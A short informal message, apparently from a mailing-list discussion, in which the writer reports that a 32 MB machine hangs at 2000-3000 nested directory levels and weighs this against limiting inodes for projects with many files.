Well, this depends on amount of physcial RAM 
on your box. my box hangs at about 2000-3000
directory levels, depending on ther load,
i have 32mb. i would have to limit number
of inodes under that which i don't want to do
since some projects have more then 1000 files.
Of course having 10000 files doesn't couse
any DoS, only having that much directories
and being inside them.
